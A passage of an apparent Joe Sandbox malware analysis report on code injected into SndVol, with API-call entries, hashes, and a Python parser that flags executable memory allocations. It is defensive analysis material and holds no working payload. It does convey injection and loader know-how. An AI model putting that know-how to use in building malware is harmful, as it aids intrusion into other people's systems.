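The NtAllocateVirtualMemory entry above is the one worth reading closely: the recorded values 00003000 and 00000040 are the Windows constants MEM_COMMIT|MEM_RESERVE and PAGE_EXECUTE_READWRITE, so this function in the 047C0000 region commits writable and executable memory, the allocation a loader makes before copying a payload into it. The script below is an added example, not code from the report or from the Joe Sandbox IDA plugin: it parses API lines in the format these function entries use, and for NtAllocateVirtualMemory decodes any slot that is a pure MEM_* combination or a bare PAGE_* value. The parenthesised list appears to be a raw stack snapshot rather than a decoded parameter list (return addresses such as 047DB104 appear among the values and unresolved slots print as ?), so the example deliberately does not map slots to parameters by position. The sample lines are copied from this report; the parser, the constant tables and the triage heuristic are the example's own assumptions.

```python
"""Parse and triage the API lines of a Joe Sandbox function entry.

Added example: neither the report nor the Joe Sandbox IDA plugin ships this
code.  Each API line has the form 'Api.Module(slot,slot,...), ref: addr'.
The slot list is treated as a raw stack snapshot ('?' = value not recovered,
return addresses mixed in), so slots are never mapped to parameters by
position; recognisable MEM_* and PAGE_* constants are searched for in any
slot instead.  The sample lines are copied from this report; the constant
tables and the heuristic are assumptions made for this example.
"""
import re
from dataclasses import dataclass
from typing import Optional

# MEM_* allocation-type flags and PAGE_* protections as defined in the public
# Windows SDK headers (winnt.h).  Only the values needed for triage are listed.
MEM_FLAGS = {
    0x00001000: "MEM_COMMIT",
    0x00002000: "MEM_RESERVE",
    0x00080000: "MEM_RESET",
    0x00100000: "MEM_TOP_DOWN",
    0x20000000: "MEM_LARGE_PAGES",
}
MEM_MASK = sum(MEM_FLAGS)          # keys are distinct bits, so sum == OR
PAGE_PROT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}

API_LINE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<module>\w+)"       # NtAllocateVirtualMemory.NTDLL
    r"(?:\((?P<args>[^)]*)\))?"                 # optional stack snapshot
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"    # call-site address in the dump
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int
    args: list                                  # int per slot, None for '?'


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return the call described by one API line, or None if it is not one."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = []
    for tok in (m.group("args") or "").split(","):
        tok = tok.strip()
        if tok:
            args.append(None if tok == "?" else int(tok, 16))
    return ApiCall(m.group("api"), m.group("module"), int(m.group("ref"), 16), args)


def decode_mem_flags(value: int) -> Optional[str]:
    """Name a non-zero value made only of known MEM_* bits, else None."""
    if value == 0 or value & ~MEM_MASK:
        return None
    return "|".join(name for bit, name in MEM_FLAGS.items() if value & bit)


def summarize_allocation(call: ApiCall) -> dict:
    """Heuristic read of an NtAllocateVirtualMemory snapshot.

    Reports every slot that decodes as a pure MEM_* combination or as a bare
    PAGE_* value.  A small slot value such as 0x40 can also be an unrelated
    integer, so 'executable' is a lead for the analyst, not proof.
    """
    values = [a for a in call.args if a is not None]
    alloc = sorted({f for f in map(decode_mem_flags, values) if f})
    prot = sorted({PAGE_PROT[v] for v in values if v in PAGE_PROT})
    return {
        "ref": call.ref,
        "allocation_types": alloc,
        "protections": prot,
        "executable": any(p.startswith("PAGE_EXECUTE") for p in prot),
    }


def triage(lines) -> tuple:
    """Map each API name to its call sites and triage the allocation calls."""
    calls = [c for c in map(parse_api_line, lines) if c is not None]
    by_api: dict = {}
    for c in calls:
        by_api.setdefault(c.api, []).append(c.ref)
    findings = [summarize_allocation(c) for c in calls
                if c.api == "NtAllocateVirtualMemory"]
    return by_api, findings


# API lines copied from the function entries in this report.
SAMPLE_LINES = [
    "• NtQueryInformationProcess.NTDLL ref: 3651A19F",
    "• NtReadFile.NTDLL(047D4D72,5EB65239,FFFFFFFF,047D4A31,?,?,047D4D72,?,047D4A31,FFFFFFFF,5EB65239,047D4D72,?,00000000), ref: 047DA425",
    "• NtCreateFile.NTDLL(00000060,047C9CF3,?,047D4BB7,047C9CF3,FFFFFFFF,?,?,FFFFFFFF,047C9CF3,047D4BB7,?,047C9CF3,00000060,00000000,00000000), ref: 047DA37D",
    "• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,047DB104,?,00000000,?,00003000,00000040,00000000,00000000,047C9CF3), ref: 047DA549",
    "• NtClose.NTDLL(047D4D50,?,?,047D4D50,047C9CF3,FFFFFFFF), ref: 047DA485",
]

if __name__ == "__main__":
    apis, findings = triage(SAMPLE_LINES)
    for name, refs in apis.items():
        print(f"{name}: {', '.join(f'{r:08X}' for r in refs)}")
    for f in findings:
        print(f"NtAllocateVirtualMemory @ {f['ref']:08X}: {f['allocation_types']} "
              f"{f['protections']} executable={f['executable']}")
```

Run against the five lines above it reports MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE at call site 047DA549. Feeding it every API line of a report gives a quick list of which functions allocate executable memory, which is where to start when looking for the copy-and-jump that the injection signatures in this report describe.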
APIs
• NtClose.NTDLL(047D4D50,?,?,047D4D50,047C9CF3,FFFFFFFF), ref: 047DA485
Memory Dump Source
• Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 30a5e1b40fbb9df25a3a67f541b366c1e5376f6ca5e14c75e8605dc12a6edb95
• Instruction ID: f557a3e92e152488ca3119ebd8a27b275da9ad0ff4889f3c412257ca8f54ba6a
• Opcode Fuzzy Hash: 30a5e1b40fbb9df25a3a67f541b366c1e5376f6ca5e14c75e8605dc12a6edb95
• Instruction Fuzzy Hash: 7EE0C2B92501146AD710EFA88C88EE7772CEF44254F1445AAFA285F282C630E60596E0
APIs
• NtClose.NTDLL(047D4D50,?,?,047D4D50,047C9CF3,FFFFFFFF), ref: 047DA485
Memory Dump Source
• Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction ID: c96271874e09a648cd29c11e41613255a407aeb9d144c199f38991e79718fff8
• Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction Fuzzy Hash: 2DD01776610214ABE714EB98CC89EA77BACEF48664F154499BA189B242C530FA0086E0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 3f6c3e0082dd1065865c43e48385172c8262b4e4924c02ae54e586b4b0804362
                                                                                                                                                  • Instruction ID: 7965f768916c9143798fbfe5d4d0ee1db67083b2ab35652326d9baec88097c37
                                                                                                                                                  • Opcode Fuzzy Hash: 3f6c3e0082dd1065865c43e48385172c8262b4e4924c02ae54e586b4b0804362
                                                                                                                                                  • Instruction Fuzzy Hash: 1D90022164140502D50172584404656004A47D0251F99C033A2024519ECA258A96A175
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 5eb590aa9a7e0ff7738c6e4ebdf178942f370f4c5e61d2b46baa11dcd05d48ff
                                                                                                                                                  • Instruction ID: 517055f3b600839f96862ac6ac5b6b71a8311bfe809f06cc6e89a5068ee127f4
                                                                                                                                                  • Opcode Fuzzy Hash: 5eb590aa9a7e0ff7738c6e4ebdf178942f370f4c5e61d2b46baa11dcd05d48ff
                                                                                                                                                  • Instruction Fuzzy Hash: F990027124140402D54072584404786004547D0311F59C022A6064518E86598ED966A9
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 42befd851a88d0b6ee09b2546d4acc0900e3b47f2d4a97c41735bc44e1ab86ee
                                                                                                                                                  • Instruction ID: 58b58c15aca54da2b7f1cd1984dc6f8ab17eb9822d8dcfbca45418c371ae3bd6
                                                                                                                                                  • Opcode Fuzzy Hash: 42befd851a88d0b6ee09b2546d4acc0900e3b47f2d4a97c41735bc44e1ab86ee
                                                                                                                                                  • Instruction Fuzzy Hash: A190026138140442D50072584414B46004587E1311F59C026E2064518D8619CD56616A
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: ee5632a0301c6fcc0554ef8b940614d6ac9898a071c6c5b8668567bbad3d17b7
                                                                                                                                                  • Instruction ID: 83ebc074465d1ae607ebaca8b9a5e43d01febec45374beb06f5e48cc143c79ab
                                                                                                                                                  • Opcode Fuzzy Hash: ee5632a0301c6fcc0554ef8b940614d6ac9898a071c6c5b8668567bbad3d17b7
                                                                                                                                                  • Instruction Fuzzy Hash: 81900221251C0042D60076684C14B47004547D0313F59C126A1154518CC91589655565
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: d94689650828e182fd4d608d554bbd9707a81f26b99fe71d1df9d41c27d9042b
                                                                                                                                                  • Instruction ID: ceb2d22371f3ed09b89d89266e0a9641ae7b1a3e3f4820a247fab7fb0d82fbfc
                                                                                                                                                  • Opcode Fuzzy Hash: d94689650828e182fd4d608d554bbd9707a81f26b99fe71d1df9d41c27d9042b
                                                                                                                                                  • Instruction Fuzzy Hash: BB90023124180402D5007258481474B004547D0312F59C022A2164519D8625895565B5
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 83029fd75314bf0b66576629411733c5eb427d82a7dd5c7fc65ff1f084e01fd9
                                                                                                                                                  • Instruction ID: bccb1bbded8d772cce9038b262f13c381be9ab9cc7db71344374c860df687e3c
                                                                                                                                                  • Opcode Fuzzy Hash: 83029fd75314bf0b66576629411733c5eb427d82a7dd5c7fc65ff1f084e01fd9
                                                                                                                                                  • Instruction Fuzzy Hash: F39002216414004245407268884494640456BE1221759C132A1998514D8559896956A9
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: a4b4a25e689582d23210df7e18280bf2d6073735881b6793aa8ef1ec3703745a
                                                                                                                                                  • Instruction ID: 983fad9963fe947828a90410f800e74748faeee39b65cf7c390fdaeb5cf26791
                                                                                                                                                  • Opcode Fuzzy Hash: a4b4a25e689582d23210df7e18280bf2d6073735881b6793aa8ef1ec3703745a
                                                                                                                                                  • Instruction Fuzzy Hash: 9A90023124148802D5107258840478A004547D0311F5DC422A542461CD869589957165
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: bb4b021e5d55ebd66eb2410d5fc3379b26abd0b3876f670262efea625205854c
                                                                                                                                                  • Instruction ID: a8c32417ee26eb0626b9f6999c580ba9b57145db423e2e9a671e1db5f0707974
                                                                                                                                                  • Opcode Fuzzy Hash: bb4b021e5d55ebd66eb2410d5fc3379b26abd0b3876f670262efea625205854c
                                                                                                                                                  • Instruction Fuzzy Hash: 9B90023124140402D50076985408686004547E0311F59D022A6024519EC66589956175
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 935d87cdbcfd53aa85dfe1b1f8bbe8d2ac8f761014701d4f8f81969ccf39ee18
                                                                                                                                                  • Instruction ID: 65b1537eaf352e65cc73b95b7c84b657ac9ef791d052c63fccd77146bdf894c6
                                                                                                                                                  • Opcode Fuzzy Hash: 935d87cdbcfd53aa85dfe1b1f8bbe8d2ac8f761014701d4f8f81969ccf39ee18
                                                                                                                                                  • Instruction Fuzzy Hash: 4A90022925340002D5807258540864A004547D1212F99D426A101551CCC915896D5365
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 9a694526472751994a56a648c96a532680e54cbeb2f85eff4ce20e3f12b4b78b
                                                                                                                                                  • Instruction ID: a6048f8bc2de0ae9e346cf34e366596f2a1db6f96ccc85fce7934e87de6f172b
                                                                                                                                                  • Opcode Fuzzy Hash: 9a694526472751994a56a648c96a532680e54cbeb2f85eff4ce20e3f12b4b78b
                                                                                                                                                  • Instruction Fuzzy Hash: 6F90022134140003D54072585418646404597E1311F59D022E1414518CD915895A5266
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 4ab9ddc2da55b45d5e2c9f38f85c1bb3d2cd34512706aaecf0c1b917e812fb53
                                                                                                                                                  • Instruction ID: 7a047565b1da2e0f7a04dc468864b79c181b9afc217eeb6a5ccd1cd960a1c094
                                                                                                                                                  • Opcode Fuzzy Hash: 4ab9ddc2da55b45d5e2c9f38f85c1bb3d2cd34512706aaecf0c1b917e812fb53
                                                                                                                                                  • Instruction Fuzzy Hash: AC900221282441525945B2584404547404657E0251799C023A2414914C8526995AD665
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 515ed6545df61b0313b6428ac55b4dd74197d3dac45bc1af7d3420bd60be9254
                                                                                                                                                  • Instruction ID: 1a3f72d69ad521038925a89736dd92978110e07c27f898b4a7d430d9455308da
                                                                                                                                                  • Opcode Fuzzy Hash: 515ed6545df61b0313b6428ac55b4dd74197d3dac45bc1af7d3420bd60be9254
                                                                                                                                                  • Instruction Fuzzy Hash: 1690023124140413D51172584504747004947D0251F99C423A142451CD96568A56A165
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 4105c96180475afdac73daccb2fb1fc7d76ef5fc7ac797e9feb14862d9c41240
                                                                                                                                                  • Instruction ID: 3028be00cf4323e883c8f89e77aca4f51b096e074a5cfe95935f0539dce248c0
                                                                                                                                                  • Opcode Fuzzy Hash: 4105c96180475afdac73daccb2fb1fc7d76ef5fc7ac797e9feb14862d9c41240
                                                                                                                                                  • Instruction Fuzzy Hash: BF900435351400030505F75C070454700C747D537135DC033F3015514CD731CD755175
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 1995da2e49ecd3264b1d077fc24dfa9c1d2a831eda1e8189dfa7b0d38aad8232
                                                                                                                                                  • Instruction ID: af63766fae92ec6d94bb555f28a52992f452c661c7e36af7f7e2166aeaab7401
                                                                                                                                                  • Opcode Fuzzy Hash: 1995da2e49ecd3264b1d077fc24dfa9c1d2a831eda1e8189dfa7b0d38aad8232
                                                                                                                                                  • Instruction Fuzzy Hash: 7A90026124240003450572584414656404A47E0211B59C032E2014554DC52589956169
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: c8ef4c9191584283d118c0b284c3c8bcb3ecf3db502cd5cd31ac08c6900cb20c
                                                                                                                                                  • Instruction ID: 996da536dc9329e068636912cf7064364646ef9d5b4743e884f6c02fb9423515
                                                                                                                                                  • Opcode Fuzzy Hash: c8ef4c9191584283d118c0b284c3c8bcb3ecf3db502cd5cd31ac08c6900cb20c
                                                                                                                                                  • Instruction Fuzzy Hash: BA90023124140802D5807258440468A004547D1311F99C026A1025618DCA158B5D77E5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4420c206828458349f6d905d6a249316b3838500a4ccb7f37ceacb7ee7c399b1
                                                                                                                                                  • Instruction ID: 584eb8c1729483d03b53a9a6042d3374bdec1a0ee691423993104cc072f1cc4b
                                                                                                                                                  • Opcode Fuzzy Hash: 4420c206828458349f6d905d6a249316b3838500a4ccb7f37ceacb7ee7c399b1
                                                                                                                                                  • Instruction Fuzzy Hash: 0B2107F3D402096BDB25DA64AD51BFF73BCAB40304F04046DEA4993240F634BA49CBA2

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 401 47c8309-47c831f 402 47c8328-47c835a call 47dc9d0 call 47cacf0 call 47d4e50 401->402 403 47c8323 call 47dbe30 401->403 410 47c835c-47c836e PostThreadMessageW 402->410 411 47c838e-47c8392 402->411 403->402 412 47c838d 410->412 413 47c8370-47c838a call 47ca480 410->413 412->411 413->412
                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 047C836A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: 0afa5f4c9209535b8e8b25869164ad7ee234cf89bc299eb541bc8de9390bfa96
                                                                                                                                                  • Instruction ID: 8955ff9adf202667549342218360e87aff7ce04ca9117dd48b034cc0ccb21210
                                                                                                                                                  • Opcode Fuzzy Hash: 0afa5f4c9209535b8e8b25869164ad7ee234cf89bc299eb541bc8de9390bfa96
